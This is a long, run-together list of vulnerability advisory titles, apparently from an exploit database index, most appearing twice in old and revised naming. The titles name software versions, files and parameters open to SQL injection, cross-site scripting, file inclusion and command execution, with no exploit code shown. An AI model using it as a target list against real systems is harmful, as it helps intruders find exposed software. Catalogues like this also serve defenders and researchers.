'/services/details.asp' 'Service_ID' Parameter SQL Injection OnePlug CMS - '/products/details.asp' 'Product_ID' Parameter SQL Injection Venom Board - Post.php3 Multiple SQL Injection Venom Board - 'Post.php3' Multiple SQL Injections microBlog 2.0 - 'index.php' Multiple SQL Injection microBlog 2.0 - 'index.php' Multiple SQL Injections NewsPHP - 'index.php' Multiple SQL Injection NewsPHP - 'index.php' Multiple SQL Injections ZixForum 1.12 - forum.asp Multiple SQL Injection ZixForum 1.12 - forum.asp Multiple SQL Injections HiveMail 1.2.2/1.3 - addressbook.update.php contactgroupid Variable Arbitrary PHP Command Execution HiveMail 1.2.2/1.3 - folders.update.php folderid Variable Arbitrary PHP Command Execution HiveMail 1.2.2/1.3 - 'addressbook.update.php' 'contactgroupid' Parameter Arbitrary PHP Command Execution HiveMail 1.2.2/1.3 - 'folders.update.php' 'folderid' Parameter Arbitrary PHP Command Execution ImageVue 0.16.1 - readfolder.php path Variable Arbitrary Directory Listing ImageVue 0.16.1 - 'readfolder.php' 'path' Parameter Arbitrary Directory Listing dotProject 2.0 - /modules/projects/gantt.php dPconfig[root_dir] Parameter Remote File Inclusion dotProject 2.0 - /includes/db_connect.php baseDir Remote File Inclusion dotProject 2.0 - /includes/session.php baseDir Parameter Remote File Inclusion dotProject 2.0 - /modules/projects/gantt2.php dPconfig[root_dir] Parameter Remote File Inclusion dotProject 2.0 - /modules/projects/vw_files.php dPconfig[root_dir] Parameter Remote File Inclusion dotProject 2.0 - /modules/admin/vw_usr_roles.php baseDir Parameter Remote File Inclusion dotProject 2.0 - /modules/public/calendar.php baseDir Parameter Remote File Inclusion dotProject 2.0 - /modules/public/date_format.php baseDir Parameter Remote File Inclusion dotProject 2.0 - /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion dotProject 2.0 - '/modules/projects/gantt.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion dotProject 2.0 - 
'/includes/db_connect.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/includes/session.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/projects/gantt2.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion dotProject 2.0 - '/modules/projects/vw_files.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion dotProject 2.0 - '/modules/admin/vw_usr_roles.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/public/calendar.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/public/date_format.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/tasks/gantt.php' 'baseDir' Parameter Remote File Inclusion MyBB 1.0.3 - private.php Multiple SQL Injection MyBB 1.0.3 - 'private.php' Multiple SQL Injections Ginkgo CMS - 'index.php rang Parameter' SQL Injection Ginkgo CMS - 'index.php' 'rang' Parameter SQL Injection Telmanik CMS Press 1.01b - 'pages.php page_name Parameter' SQL Injection Telmanik CMS Press 1.01b - 'pages.php' 'page_name' Parameter SQL Injection DCI-Taskeen 1.03 - basket.php Multiple Parameter SQL Injection DCI-Taskeen 1.03 - cat.php Multiple Parameter SQL Injection DCI-Taskeen 1.03 - 'basket.php' Multiple Parameter SQL Injections DCI-Taskeen 1.03 - 'cat.php' Multiple Parameter SQL Injections sBlog 0.7.2 - search.php keyword Variable POST Method Cross-Site Scripting sBlog 0.7.2 - comments_do.php Multiple Variable POST Method Cross-Site Scripting sBlog 0.7.2 - 'search.php' 'keyword' Parameter POST Method Cross-Site Scripting sBlog 0.7.2 - 'comments_do.php' Multiple Variable POST Method Cross-Site Scripting PHPFox 3.6.0 (build3) - Multiple SQL Injection PHPFox 3.6.0 (build3) - Multiple SQL Injections Verisign MPKI 6.0 - Haydn.exe Cross-Site Scripting Verisign MPKI 6.0 - 'Haydn.exe' Cross-Site Scripting DSLogin 1.0 - 'index.php' Multiple SQL Injection DSLogin 1.0 - 'index.php' Multiple SQL Injections MLMAuction Script - 'gallery.php id Parameter' SQL 
Injection MLMAuction Script - 'gallery.php' 'id' Parameter SQL Injection PHPMyForum 4.0 - 'index.php' type Variable CRLF Injection PHPMyForum 4.0 - 'index.php' 'type' Parameter CRLF Injection APT-webshop 3.0/4.0 - modules.php Multiple SQL Injection APT-webshop 3.0/4.0 - modules.php Multiple SQL Injections Cisco CallManager 3.x/4.x - Web Interface ccmadmin/phonelist.asp pattern Parameter Cross-Site Scripting Cisco CallManager 3.x/4.x - Web Interface ccmuser/logon.asp Cross-Site Scripting Cisco CallManager 3.x/4.x - Web Interface 'ccmadmin/phonelist.asp' Pattern Parameter Cross-Site Scripting Cisco CallManager 3.x/4.x - Web Interface 'ccmuser/logon.asp' Cross-Site Scripting 321soft PHP-Gallery 0.9 - 'index.php' path Variable Arbitrary Directory Listing 321soft PHP-Gallery 0.9 - 'index.php' 'path' Parameter Arbitrary Directory Listing Pacheckbook 1.1 - 'index.php' Multiple SQL Injection Pacheckbook 1.1 - 'index.php' Multiple SQL Injections Creative Software UK Community Portal 1.1 - PollResults.php Multiple Parameter SQL Injection Creative Software UK Community Portal 1.1 - 'PollResults.php' Multiple Parameter SQL Injections EvoTopsite 2.0 - 'index.php' Multiple SQL Injection timobraun Dynamic Galerie 1.0 - 'index.php' pfad Variable Arbitrary Directory Listing timobraun Dynamic Galerie 1.0 - galerie.php pfad Variable Arbitrary Directory Listing EvoTopsite 2.0 - 'index.php' Multiple SQL Injections timobraun Dynamic Galerie 1.0 - 'index.php' 'pfad' Parameter Arbitrary Directory Listing timobraun Dynamic Galerie 1.0 - 'galerie.php' 'pfad' Parameter Arbitrary Directory Listing Gphotos 1.4/1.5 - 'index.php' rep Variable Traversal Arbitrary Directory Listing Gphotos 1.4/1.5 - 'index.php' 'rep' Parameter Traversal Arbitrary Directory Listing Mini-NUKE 2.3 - Your_Account.asp Multiple SQL Injection Mini-NUKE 2.3 - 'Your_Account.asp' Multiple SQL Injections Woltlab Burning Board FLVideo Addon - 'video.php value Parameter' SQL Injection Woltlab Burning Board FLVideo Addon - 
'video.php' 'value' Parameter SQL Injection glFusion 1.3.0 - 'search.php cat_id Parameter' SQL Injection glFusion 1.3.0 - 'search.php' 'cat_id' Parameter SQL Injection Geodesic Solutions Multiple Products - 'index.php' b Parameter SQL Injection Geodesic Solutions Multiple Products - 'index.php' 'b' Parameter SQL Injection RadScripts - a_editpage.php Filename Variable Arbitrary File Overwrite RadScripts - 'a_editpage.php' 'Filename' Parameter Arbitrary File Overwrite Banex PHP MySQL Banner Exchange 2.21 - admin.php Multiple Parameter SQL Injection Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple Parameter SQL Injections XennoBB 2.1 - profile.php Multiple SQL Injection XennoBB 2.1 - 'profile.php' Multiple SQL Injections Vtiger CRM 5.4.0 - 'index.php onlyforuser Parameter' SQL Injection Vtiger CRM 5.4.0 - 'index.php' 'onlyforuser' Parameter SQL Injection CubeCart 3.0.x - /admin/print_order.php order_id Parameter Cross-Site Scripting CubeCart 3.0.x - '/admin/print_order.php' 'order_id' Parameter Cross-Site Scripting CubeCart 3.0.x - /admin/nav.php Multiple Parameter Cross-Site Scripting CubeCart 3.0.x - /admin/image.php image Parameter Cross-Site Scripting CubeCart 3.0.x - /admin/header.inc.php Multiple Parameter Cross-Site Scripting CubeCart 3.0.x - /footer.inc.php la_pow_by Parameter Cross-Site Scripting CubeCart 3.0.x - '/admin/nav.php' Multiple Parameter Cross-Site Scripting CubeCart 3.0.x - '/admin/image.php' 'image' Parameter Cross-Site Scripting CubeCart 3.0.x - '/admin/header.inc.php' Multiple Parameter Cross-Site Scripting CubeCart 3.0.x - '/footer.inc.php' 'la_pow_by' Parameter Cross-Site Scripting AckerTodo 4.2 - 'login.php' Multiple SQL Injection AckerTodo 4.2 - 'login.php' Multiple SQL Injections Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php sondage Parameter' SQL Injection Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php' 'sondage' Parameter SQL Injection INFINICART - browsesubcat.asp Multiple Parameter SQL Injection INFINICART - 'browsesubcat.asp' Multiple 
Parameter SQL Injection Car Site Manager - csm/asp/listings.asp Multiple Parameter SQL Injection Car Site Manager - 'csm/asp/listings.asp' Multiple Parameter SQL Injections Dragon Internet Events Listing 2.0.01 - admin_login.asp Multiple Field SQL Injection ASPIntranet 2.1 - Multiple SQL Injection Dragon Internet Events Listing 2.0.01 - 'admin_login.asp' Multiple Field SQL Injections ASPIntranet 2.1 - Multiple SQL Injections Image Gallery with Access Database - default.asp Multiple Parameter SQL Injection Image Gallery with Access Database - 'default.asp' Multiple Parameter SQL Injection 20/20 Applications Data Shed 1.0 - listings.asp Multiple Parameter SQL Injection 20/20 Applications Data Shed 1.0 - 'listings.asp' Multiple Parameter SQL Injections BestWebApp Dating Site Login Component - Multiple Field SQL Injection BestWebApp Dating Site Login Component - Multiple Field SQL Injections Enthrallweb eClassifieds - ad.asp Multiple Parameter SQL Injection Enthrallweb eClassifieds - 'ad.asp' Multiple Parameter SQL Injection BirdBlog 1.4 - /admin/admincore.php msg Parameter Cross-Site Scripting BirdBlog 1.4 - /admin/comments.php month Parameter Cross-Site Scripting BirdBlog 1.4 - /admin/entries.php month Parameter Cross-Site Scripting BirdBlog 1.4 - /admin/logs.php page Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/admincore.php' 'msg' Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/comments.php' 'month' Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/entries.php' 'month' Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/logs.php' 'page' Parameter Cross-Site Scripting Grandora Rialto 1.6 - /admin/default.asp Multiple Field SQL Injection Grandora Rialto 1.6 - '/admin/default.asp' Multiple Field SQL Injection Grandora Rialto 1.6 - searchkey.asp Multiple Parameter SQL Injection Grandora Rialto 1.6 - searchmain.asp Multiple Parameter SQL Injection Grandora Rialto 1.6 - searchoption.asp Multiple Parameter SQL Injection Grandora Rialto 1.6 - 
'searchkey.asp' Multiple Parameter SQL Injection Grandora Rialto 1.6 - 'searchmain.asp' Multiple Parameter SQL Injection Grandora Rialto 1.6 - 'searchoption.asp' Multiple Parameter SQL Injection Enthrallweb eHomes - compareHomes.asp Multiple Parameter SQL Injection Enthrallweb eHomes - result.asp Multiple Parameter SQL Injection Enthrallweb eHomes - 'compareHomes.asp' Multiple Parameter SQL Injection Enthrallweb eHomes - 'result.asp' Multiple Parameter SQL Injection DUdownload 1.0/1.1 - detail.asp Multiple Parameter SQL Injection DUdownload 1.0/1.1 - 'detail.asp' Multiple Parameter SQL Injections Aspee Ziyaretci Defteri - giris.asp Multiple Field SQL Injection Aspee Ziyaretci Defteri - giris.asp Multiple Field SQL Injections ClickContact - default.asp Multiple SQL Injection ClickContact - 'default.asp' Multiple SQL Injections Dol Storye - Dettaglio.asp Multiple SQL Injection Dol Storye - 'Dettaglio.asp' Multiple SQL Injections Efkan Forum 1.0 - Grup Variable SQL Injection Efkan Forum 1.0 - 'Grup' Parameter SQL Injection EditTag 1.2 - edittag.cgi file Variable Arbitrary File Disclosure EditTag 1.2 - edittag.pl file Variable Arbitrary File Disclosure EditTag 1.2 - edittag_mp.cgi file Variable Arbitrary File Disclosure EditTag 1.2 - edittag_mp.pl file Variable Arbitrary File Disclosure EditTag 1.2 - 'edittag.cgi' 'file' Parameter Arbitrary File Disclosure EditTag 1.2 - 'edittag.pl' 'file' Parameter Arbitrary File Disclosure EditTag 1.2 - 'edittag_mp.cgi' 'file' Parameter Arbitrary File Disclosure EditTag 1.2 - 'edittag_mp.pl' 'file' Parameter Arbitrary File Disclosure Indexu 5.0/5.3 - mailing_list.php Multiple Variables Cross-Site Scripting Indexu 5.0/5.3 - 'mailing_list.php' Multiple Parameters Cross-Site Scripting Project'Or RIA 3.4.0 - 'objectDetail.php objectId Parameter' SQL Injection Project'Or RIA 3.4.0 - 'objectDetail.php' 'objectId' Parameter SQL Injection WordPress 2.1.1 - 'wp-includes/theme.php' iz Variable Arbitrary Command Execution Tyger Bug Tracking 
System 1.1.3 - 'ViewBugs.php' 's' Variable SQL Injection WordPress 2.1.1 - 'wp-includes/theme.php' 'iz' Parameter Arbitrary Command Execution Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php' 's' Parameter SQL Injection aBitWhizzy - whizzylink.php d Variable Traversal Arbitrary Directory Listing aBitWhizzy - 'whizzylink.php' 'd' Parameter Traversal Arbitrary Directory Listing MyBloggie 2.1.x - 'index.php' Multiple SQL Injection MyBloggie 2.1.x - 'index.php' Multiple SQL Injections PHPLive! 3.2.2 - super/info.php BASE_URL Variable Parameter Cross-Site Scripting PHPLive! 3.2.2 - 'super/info.php' 'BASE_URL' Parameter Cross-Site Scripting JFFNms 0.8.3 - auth.php Multiple Parameter SQL Injection JFFNms 0.8.3 - 'auth.php' Multiple Parameter SQL Injection DotClear 1.2.x - /ecrire/trackback.php post_id Parameter Cross-Site Scripting DotClear 1.2.x - /tools/thememng/index.php tool_url Parameter Cross-Site Scripting DotClear 1.2.x - '/ecrire/trackback.php' 'post_id' Parameter Cross-Site Scripting DotClear 1.2.x - '/tools/thememng/index.php' 'tool_url' Parameter Cross-Site Scripting PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injection PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injections Exponent CMS 0.96.5/0.96.6 - iconspopup.php icodir Variable Traversal Arbitrary Directory Listing Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php' 'icodir' Parameter Traversal Arbitrary Directory Listing Phorum 5.1.20 - admin.php module[] Variable Full Path Disclosure Phorum 5.1.20 - 'admin.php' 'module[]' Parameter Full Path Disclosure Chamilo Lms 1.9.6 - 'profile.php password0 Parameter' SQL Injection Dokeos 2.2 RC2 - 'index.php language Parameter' SQL Injection Chamilo Lms 1.9.6 - 'profile.php' 'password0' Parameter SQL Injection Dokeos 2.2 RC2 - 'index.php' 'language' Parameter SQL Injection UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Variable Full Path Disclosure UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Parameters Full 
Path Disclosure PHPAccounts 0.5 - 'index.php' Multiple SQL Injection PHPAccounts 0.5 - 'index.php' Multiple SQL Injections NetFlow Analyzer 5 - /jspui/applicationList.jsp alpha Parameter Cross-Site Scripting NetFlow Analyzer 5 - /jspui/appConfig.jsp task Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/applicationList.jsp' 'alpha' Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/appConfig.jsp' 'task' Parameter Cross-Site Scripting NetFlow Analyzer 5 - /jspui/selectDevice.jsp rtype Parameter Cross-Site Scripting NetFlow Analyzer 5 - /jspui/customReport.jsp rtype Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/selectDevice.jsp' 'rtype' Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/customReport.jsp' 'rtype' Parameter Cross-Site Scripting geoBlog MOD_1.0 - deletecomment.php id Variable Arbitrary Comment Deletion geoBlog MOD_1.0 - deleteblog.php id Variable Arbitrary Blog Deletion geoBlog MOD_1.0 - 'deletecomment.php' 'id' Parameter Arbitrary Comment Deletion geoBlog MOD_1.0 - 'deleteblog.php' 'id' Parameter Arbitrary Blog Deletion Next Gen Portfolio Manager - default.asp Multiple SQL Injection Next Gen Portfolio Manager - 'default.asp' Multiple SQL Injections ACG News 1.0 - 'index.php' Multiple SQL Injection Cisco CallManager 4.2 - / CUCM 4.2 Logon Page lang Parameter SQL Injection ACG News 1.0 - 'index.php' Multiple SQL Injections Cisco CallManager 4.2 / CUCM 4.2 - Logon Page 'lang' Parameter SQL Injection WebBatch - webbatch.exe URL Cross-Site Scripting WebBatch - webbatch.exe dumpinputdata Variable Remote Information Disclosure WebBatch - 'webbatch.exe' URL Cross-Site Scripting WebBatch - 'webbatch.exe' 'dumpinputdata' Parameter Remote Information Disclosure NetWin DNews - Dnewsweb.exe Multiple Cross-Site Scripting Vulnerabilities NetWin DNews - 'Dnewsweb.exe' Multiple Cross-Site Scripting Vulnerabilities Scott Manktelow Design Stride 1.0 - Courses detail.php Multiple SQL Injection Scott Manktelow Design Stride 1.0 
Courses - 'detail.php' Multiple SQL Injections Article Dashboard - 'admin/login.php' Multiple SQL Injection Article Dashboard - 'admin/login.php' Multiple SQL Injections Multi-Forums - Directory.php Multiple SQL Injection Multi-Forums - 'Directory.php' Multiple SQL Injections JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injection JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injections Absolute News Manager .NET 5.1 - 'pages/default.aspx' template Variable Remote File Access Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' Multiple Parameter SQL Injection Absolute News Manager .NET 5.1 - 'pages/default.aspx' 'template' Parameter Remote File Access Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' Multiple Parameter SQL Injections phpRPG 0.8 - /tmp Directory PHPSESSID Cookie Session Hijacking phpRPG 0.8 - '/tmp' Directory PHPSESSID Cookie Session Hijacking Web Sihirbazi 5.1.1 - 'default.asp' Multiple SQL Injection Web Sihirbazi 5.1.1 - 'default.asp' Multiple SQL Injections eTicket 1.5.5.2 - search.php Multiple Parameter SQL Injection eTicket 1.5.5.2 - admin.php Multiple Parameter SQL Injection eTicket 1.5.5.2 - 'search.php' Multiple Parameter SQL Injection eTicket 1.5.5.2 - 'admin.php' Multiple Parameter SQL Injection Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/login.jsp Multiple Parameter Cross-Site Scripting Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/account/findForSelect.jsp resultsForm Parameter Cross-Site Scripting Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/help/index.jsp helpUrl Variable Remote Frame Injection Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/user/main.jsp activeControl Parameter Cross-Site Scripting Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/login.jsp' Multiple Parameter Cross-Site Scripting Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/account/findForSelect.jsp' 'resultsForm' Parameter Cross-Site Scripting Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/help/index.jsp' 
'helpUrl' Parameter Remote Frame Injection Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/user/main.jsp' 'activeControl' Parameter Cross-Site Scripting MyBB 1.2.10 - 'moderation.php' Multiple SQL Injection MyBB 1.2.10 - 'moderation.php' Multiple SQL Injections PacerCMS 0.6 - 'id' Parameter Multiple SQL Injection PacerCMS 0.6 - 'id' Parameter Multiple SQL Injections Ipswitch WS_FTP Server 6 - /WSFTPSVR/FTPLogServer/LogViewer.asp Authentication Bypass Ipswitch WS_FTP Server 6 - '/WSFTPSVR/FTPLogServer/LogViewer.asp' Authentication Bypass Cacti 0.8.7 - tree.php Multiple Parameter SQL Injection Cacti 0.8.7 - 'tree.php' Multiple Parameter SQL Injections Site2Nite Real Estate Web - 'agentlist.asp' Multiple SQL Injection Site2Nite Real Estate Web - 'agentlist.asp' Multiple SQL Injections WebcamXP 3.72.440/4.05.280 Beta - /pocketpc camnum Variable Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 Beta - /show_gallery_pic id Variable Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc' 'camnum' Parameter Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic' 'id' Parameter Arbitrary Memory Disclosure Elastic Path 4.1 - 'manager/FileManager.jsp' dir Variable Traversal Arbitrary Directory Listing Elastic Path 4.1 - 'manager/FileManager.jsp' 'dir' Parameter Traversal Arbitrary Directory Listing osCommerce 2.3.3.4 - 'geo_zones.php zID Parameter' SQL Injection osCommerce 2.3.3.4 - 'geo_zones.php' 'zID' Parameter SQL Injection D-Link DSL-2750B (ADSL Router) - Cross-Site Request Forgery D-Link DSL-2750B ADSL Router - Cross-Site Request Forgery Netgear DGN2200 N300 Wireless Router - Multiple Vulnerabilities NETGEAR DGN2200 N300 Wireless Router - Multiple Vulnerabilities Concrete5 5.6.2.1 - 'index.php cID Parameter' SQL Injection Concrete5 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection TLM CMS 1.1 - 'index.php' Multiple SQL Injection TLM CMS 1.1 - 'index.php' Multiple SQL Injections RunCMS 1.6.1 - 'pm.class.php' 
Multiple SQL Injection RunCMS 1.6.1 - 'pm.class.php' Multiple SQL Injections IBD Micro CMS 3.5 - 'microcms-admin-login.php' Multiple SQL Injection IBD Micro CMS 3.5 - 'microcms-admin-login.php' Multiple SQL Injections WordPress Plugin AdRotate 3.9.4 - 'clicktracker.php track Parameter' SQL Injection WordPress Plugin AdRotate 3.9.4 - 'clicktracker.php' 'track' Parameter SQL Injection JustPORTAL 1.0 - 'site' Parameter Multiple SQL Injection Proje ASP Portal 2.0 - 'id' Parameter Multiple SQL Injection dvbbs 8.2 - 'login.asp' Multiple SQL Injection JustPORTAL 1.0 - 'site' Parameter Multiple SQL Injections Proje ASP Portal 2.0 - 'id' Parameter Multiple SQL Injections dvbbs 8.2 - 'login.asp' Multiple SQL Injections Te Ecard - 'id' Parameter Multiple SQL Injection Te Ecard - 'id' Parameter Multiple SQL Injections Benja CMS 0.1 - /admin/admin_edit_submenu.php URL Cross-Site Scripting Benja CMS 0.1 - '/admin/admin_edit_submenu.php' URL Cross-Site Scripting Benja CMS 0.1 - /admin/admin_edit_topmenu.php URL Cross-Site Scripting Benja CMS 0.1 - '/admin/admin_edit_topmenu.php' URL Cross-Site Scripting PHP Ticket System Beta 1 - 'get_all_created_by_user.php id Parameter' SQL Injection PHP Ticket System Beta 1 - 'get_all_created_by_user.php' 'id' Parameter SQL Injection webERP 4.11.3 - 'SalesInquiry.php SortBy Parameter' SQL Injection webERP 4.11.3 - 'SalesInquiry.php' 'SortBy' Parameter SQL Injection couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injection couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injections Claroline 1.8.9 - claroline/redirector.php url Variable Arbitrary Site Redirect Claroline 1.8.9 - 'claroline/redirector.php' 'url' Parameter Arbitrary Site Redirect EasyPublish 3.0 - 'read' Parameter Multiple SQL Injection / Cross-Site Scripting EasyPublish 3.0 - 'read' Parameter Multiple SQL Injections / Cross-Site Scripting ownCloud 4.0.x/4.5.x - 'upload.php Filename Parameter' Remote Code Execution ownCloud 4.0.x/4.5.x - 
'upload.php' 'Filename' Parameter Remote Code Execution Battle.net Clan Script 1.5.x - 'index.php' Multiple SQL Injection Battle.net Clan Script 1.5.x - 'index.php' Multiple SQL Injections ZYXEL Router P-660HN-T1A - Login Bypass ZYXEL P-660HN-T1A Router - Login Bypass PromoProducts - 'view_product.php' Multiple SQL Injection PromoProducts - 'view_product.php' Multiple SQL Injections EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injection EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injections OpenCart 1.5.6.1 - 'openbay' Multiple SQL Injection OpenCart 1.5.6.1 - 'openbay' Multiple SQL Injections InterWorx Control Panel 5.0.13 build 574 - 'xhr.php i Parameter' SQL Injection InterWorx Control Panel 5.0.13 build 574 - 'xhr.php' 'i' Parameter SQL Injection Tandis CMS 2.5 - 'index.php' Multiple SQL Injection Tandis CMS 2.5 - 'index.php' Multiple SQL Injections TWiki 4.x - SEARCH Variable Remote Command Execution TWiki 4.x - URLPARAM Variable Cross-Site Scripting TWiki 4.x - 'SEARCH' Parameter Remote Command Execution TWiki 4.x - 'URLPARAM' Parameter Cross-Site Scripting DO-CMS 3.0 - 'p' Parameter Multiple SQL Injection DO-CMS 3.0 - 'p' Parameter Multiple SQL Injections MKPortal 1.2.1 - /modules/blog/index.php Home Template Textarea SQL Injection MKPortal 1.2.1 - /modules/rss/handler_image.php i Parameter Cross-Site Scripting MKPortal 1.2.1 - '/modules/blog/index.php' Home Template Textarea SQL Injection MKPortal 1.2.1 - '/modules/rss/handler_image.php' 'i' Parameter Cross-Site Scripting Banking@Home 2.1 - 'login.asp' Multiple SQL Injection Banking@Home 2.1 - 'login.asp' Multiple SQL Injections kitForm CRM Extension 0.43 - 'sorter.php sorter_value Parameter' SQL Injection kitForm CRM Extension 0.43 - 'sorter.php' 'sorter_value' Parameter SQL Injection dompdf 0.6.0 - 'dompdf.php read Parameter' Arbitrary File Read dompdf 0.6.0 - 'dompdf.php' 'read' Parameter Arbitrary File Read Multiple JiRo's Products - 'files/login.asp' Multiple SQL Injection Multiple 
JiRo's Products - 'files/login.asp' Multiple SQL Injections VisualShapers EZContents 2.0.3 - Authentication Bypass / Multiple SQL Injection VisualShapers EZContents 2.0.3 - Authentication Bypass / Multiple SQL Injections Pars CMS - 'RP' Parameter Multiple SQL Injection Pars CMS - 'RP' Parameter Multiple SQL Injections tenfourzero.net Shutter 0.1.4 - 'admin.html' Multiple SQL Injection tenfourzero.net Shutter 0.1.4 - 'admin.html' Multiple SQL Injections MODx 1.0.3 - 'index.php' Multiple SQL Injection MODx 1.0.3 - 'index.php' Multiple SQL Injections HuronCMS - 'index.php' Multiple SQL Injection HuronCMS - 'index.php' Multiple SQL Injections 4x CMS - 'login.php' Multiple SQL Injection 4x CMS - 'login.php' Multiple SQL Injections Affiliate Store Builder - 'edit_cms.php' Multiple SQL Injection Affiliate Store Builder - 'edit_cms.php' Multiple SQL Injections ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injections GREEZLE - Global Real Estate Agent Login Multiple SQL Injection (GREEZLE) Global Real Estate Agent Login - Multiple SQL Injections SaffaTunes CMS - 'news.php' Multiple SQL Injection SaffaTunes CMS - 'news.php' Multiple SQL Injections pragmaMX 0.1.11 - 'modules.php' Multiple SQL Injection pragmaMX 0.1.11 - 'modules.php' Multiple SQL Injections DiamondList - /user/main/update_settings setting[site_title] Parameter Cross-Site Scripting DiamondList - /user/main/update_category category[description] Parameter Cross-Site Scripting DiamondList - '/user/main/update_settings' 'setting[site_title]' Parameter Cross-Site Scripting DiamondList - '/user/main/update_category' 'category[description]' Parameter Cross-Site Scripting vBulletin 4.0.x < 4.1.2 - 'search.php cat Parameter' SQL Injection vBulletin 4.0.x < 4.1.2 - 'search.php' 'cat' Parameter SQL Injection Mulitple WordPress Themes - 'admin-ajax.php img Parameter' Arbitrary File Download Mulitple WordPress Themes - 'admin-ajax.php' 'img' Parameter Arbitrary 
File Download tourismscripts HotelBook - 'hotel_id' Parameter Multiple SQL Injection tourismscripts HotelBook - 'hotel_id' Parameter Multiple SQL Injections APBook 1.3 - Admin Login Multiple SQL Injection APBook 1.3 - Admin Login Multiple SQL Injections MODx manager - /controllers/default/resource/tvs.php class_key Parameter Traversal Local File Inclusion MODx manager - '/controllers/default/resource/tvs.php' 'class_key' Parameter Traversal Local File Inclusion Bacula-Web 5.2.10 - 'joblogs.php jobid Parameter' SQL Injection Bacula-Web 5.2.10 - 'joblogs.php' 'jobid' Parameter SQL Injection PHP Scripts Now Riddles - /riddles/results.php searchQuery Parameter Cross-Site Scripting PHP Scripts Now Riddles - /riddles/list.php catid Parameter SQL Injection PHP Scripts Now Riddles - '/riddles/results.php' 'searchQuery' Parameter Cross-Site Scripting PHP Scripts Now Riddles - '/riddles/list.php' 'catid' Parameter SQL Injection Easy Banner 2009.05.18 - member.php Multiple Parameter SQL Injection Authentication Bypass Easy Banner 2009.05.18 - 'member.php' Multiple Parameter SQL Injection / Authentication Bypass E-lokaler CMS 2 - Admin Login Multiple SQL Injection E-lokaler CMS 2 - Admin Login Multiple SQL Injections Blog:CMS 4.2.1 e - Multiple HTML Injection / Cross-Site Scripting Blog:CMS 4.2.1 e - Multiple HTML Injections / Cross-Site Scripting Piwigo 2.6.0 - 'picture.php rate Parameter' SQL Injection Piwigo 2.6.0 - 'picture.php' 'rate' Parameter SQL Injection Eleanor CMS - Cross-Site Scripting / Multiple SQL Injection Eleanor CMS - Cross-Site Scripting / Multiple SQL Injections Netgear WNR500 Wireless Router - Parameter Traversal Arbitrary File Access Exploit NETGEAR WNR500 Wireless Router - Parameter Traversal Arbitrary File Access Exploit PHPMyRecipes 1.2.2 - 'dosearch.php words_exact Parameter' SQL Injection PHPMyRecipes 1.2.2 - 'dosearch.php' 'words_exact' Parameter SQL Injection Cosmoshop 10.05.00 - Multiple Cross-Site Scripting / SQL Injection Cosmoshop 10.05.00 - 
Multiple Cross-Site Scripting / SQL Injections BoutikOne - search.php Multiple Parameter SQL Injection BoutikOne - 'search.php' Multiple Parameter SQL Injections Ripe Website Manager 1.1 - Cross-Site Scripting / Multiple SQL Injection Ripe Website Manager 1.1 - Cross-Site Scripting / Multiple SQL Injections Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injection Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injections Cetera eCommerce - Multiple Cross-Site Scripting / SQL Injection Cetera eCommerce - Multiple Cross-Site Scripting / SQL Injections GuppY 4.6.14 - 'lng' Parameter Multiple SQL Injection GuppY 4.6.14 - 'lng' Parameter Multiple SQL Injections Soitec SmartEnergy 1.4 - SCADA Login SQL Injection Authentication Bypass Soitec SmartEnergy 1.4 - SCADA Login SQL Injection / Authentication Bypass CIK Telecom VoIP router SVG6000RW - Privilege Escalation / Command Execution CIK Telecom VoIP Router SVG6000RW - Privilege Escalation / Command Execution PHPMyRecipes 1.2.2 - 'browse.php category Parameter' SQL Injection PHPMyRecipes 1.2.2 - 'browse.php' 'category' Parameter SQL Injection 4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injection 